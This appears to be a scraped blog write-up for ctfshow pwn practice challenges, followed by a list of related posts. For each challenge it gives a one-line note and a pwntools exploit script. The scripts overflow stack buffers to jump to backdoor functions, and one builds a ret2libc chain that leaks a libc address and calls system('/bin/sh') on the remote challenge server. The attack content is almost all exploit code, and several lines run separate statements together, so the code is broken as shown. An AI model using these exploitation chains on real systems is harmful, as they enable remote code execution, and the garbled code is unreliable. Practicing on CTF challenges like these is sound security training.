PWN-PRACTICE-CTFSHOW-2
PWN-PRACTICE-CTFSHOW-2
- pwn05
- pwn06
- pwn07
- 01栈溢出之ret2text
pwn05
栈溢出,覆盖返回地址为后门函数getFlag起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28091)
elf=ELF("./pwn1")getFlag=0x08048486
payload="a"*0x14+"bbbb"+p32(getFlag)
io.sendline(payload)io.interactive()
pwn06
栈溢出,覆盖返回地址为后门函数getFlag起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28011)
elf=ELF("./pwn1")getFlag=0x400577
ret=0x40044e
payload="a"*0xC+"b"*8+p64(ret)+p64(getFlag)
io.sendline(payload)io.interactive()
pwn07
栈溢出,ret2libc
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28098)
elf=ELF("./pwn1")puts_got=elf.got["puts"]
puts_plt=elf.plt["puts"]
main_addr=0x40061F
pop_rdi=0x4006e3
ret=0x4004c6#gdb.attach(io,"b * 0x40061D")
#pause()payload="a"*0xc+"b"*8+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
io.sendline(payload)
puts_addr=u64(io.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
print("puts_addr=="+hex(puts_addr))
libc_base=puts_addr-0x0809c0
system=libc_base+0x04f440
binsh=libc_base+0x1b3e9apayload="a"*0xc+"b"*8+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(system)+p64(main_addr)
io.sendline(payload)#pause()io.interactive()
01栈溢出之ret2text
栈溢出
覆盖返回地址为后门函数ctfshow起始地址即可
# -*- coding:utf-8 -*-
from pwn import *
context.log_level="debug"
#io=process("./pwn1")
io=remote("pwn.challenge.ctf.show",28184)
elf=ELF("./pwn1")ctfshow=0x400637
ret=0x4004fe
payload="a"*0x80+"b"*8+p64(ret)+p64(ctfshow)
io.sendline(payload)io.interactive()
PWN-PRACTICE-CTFSHOW-2相关推荐
- CTFshow——Pwn(1)
CTFshow--Pwn(1) 有点懒不想写write up了.只有exploit. PWN签到题 from pwn import * p = remote('xxx',xxx) p.interact ...
- ctfshow pwn——PWN签到题、pwn02
PWN PWN签到题 pwn02 PWN签到题 nc连上就行了 pwn02 check一下是32位,用32位ida打开看看 很直白的pwnme函数 9字节的空间读入了50字节,产生了栈溢出 用pwnd ...
- CTF比赛PWN题sgtlibc通用快速解题框架
CTF比赛PWN题sgtlibc通用快速解题框架 安装 开源地址:https://github.com/serfend/sgtlibc 使用 pip install sgtlibc -U 安装pwn解 ...
- CTFshow 击剑杯 部分WP
摆烂了摆烂了 太难了 聪明的师傅已经组队打起月赛了 试试能不能苟住前5 苟住了 复现的后面再补充吧 文章目录 1.Misc 中文识别带师 2.Web 简单的验证码 easyPOP 3.Pwn pwn0 ...
- CTFSHOW 套娃shell
CTFSHOW 套娃shell 1.题目给的是用nc连接的,测试了下,传个请求包过去就可以了,比如(最后的换行不要忘了): GET /?file=/a HTTP/1.1 Host: 127.0.0.1 ...
- [ CTF ] WriteUp- 20221003 CTFShow新(脑洞)手(套路)杯
目录 [Misc]哇库哇库 [Misc]显卡坏了 赛后看官方wp给的脚本: [Web]easy_eval [Web]repairman [Crypto]easy_base [Crypto]天知地知(赛 ...
- ctfshow愚人节欢乐赛wp(部分)
目录 特殊base 凌晨四点的ctfshow php的简单RCE 以旧换新(签退-送分) 暴躁的zip Easy_game 这次月赛拿了个第十二,差一丢丢,只能说凌晨四点赚到了,下面这些是我比赛的时候 ...
- ctfshow吃瓜杯 八月群赛 WriteUp/WP
Web: shellme 题目问题,没什么说的,进去直接搜ctfshow就是flag 热身 签到题,做过web入门的都应该知道怎么绕,分开来看 比如第一个部分可以用小数绕过,第二部分没有字母,可以用8 ...
- Hitcon 2016 Pwn赛题学习
PS:这是我很久以前写的,大概是去年刚结束Hitcon2016时写的.写完之后就丢在硬盘里没管了,最近翻出来才想起来写过这个,索性发出来 0x0 前言 Hitcon个人感觉是高质量的比赛,相比国内的C ...
- HDU1089-1096 A+B for Input-Output Practice 系列问题(输入输出格式练习)
HDU1089 A+B for Input-output Practice (1) 问题描述:每行输入一对整数a和b,每行对应输出a与b的和. Sample Input 1 5 10 20 Sampl ...
最新文章
- Segment Routing — SRv6 — 统一的 SDN 控制面与数据面
- 将整型字符串转成整数值
- 【干货】策划一个线上活动的整体流程
- 76. 最小覆盖子串
- H.264入门级概念之I、B、P帧
- c语言中闰年 日期 天数 统计出在某个特定的年份中,出现了多少次既是13号又是星期五的情形
- mysql长事务慢查询解决方案_MySQL : 如何监控和处理慢查询与长事务 ?
- POJ2083-Fractal
- 14-一级指针和多级指针
- 搜索引擎自动提交连接php文件,死链检测工具(自动提交给百度,逆天了)
- lcx 通过端口转发实现内网穿透
- 初学者想自学单片机需要买什么呢?
- 如何辨别BGP带宽的真假?
- 通俗易懂的讲解 网关是什么
- Postgis使用工具osm2pgsql导入OpenStreetMap数据
- Phython画星空(较复杂)
- RN综合演练,仿美团电商(谢谢你的STAR)
- 查看jvm的运行参数
- 全国主要城市程序员就业去处,了解后薪资翻倍
- MySQL:环境搭建,初识数据库----Datawhale第一次打卡笔记
热门文章
- php_mysql注入load_file()IIS配置文件获取
- sharepoint2010的弹出等待提示的对话框
- intent几种传值数组、对象、集合(Array,Object,List)
- Java虚拟机(JVM)面试题大集合
- c语言三阶素数魔方阵,用C语言构造3*3素数魔方阵,即找出9个不大于500的素数并排成魔方阵。...
- 幅值与峰峰值的计算_电厂振动测量、计算基础及汽轮机组振动标准!
- mysql提供了表示日期和时间的数据类型_MySQL数据类型 - 日期和时间类型(1)
- lombok的使用三部曲及使用中遇到的问题(持续更新)
- B. Trouble Sort Codeforces Round #648 (Div. 2)
- ib网卡命令_infiniband交换机配置命令总结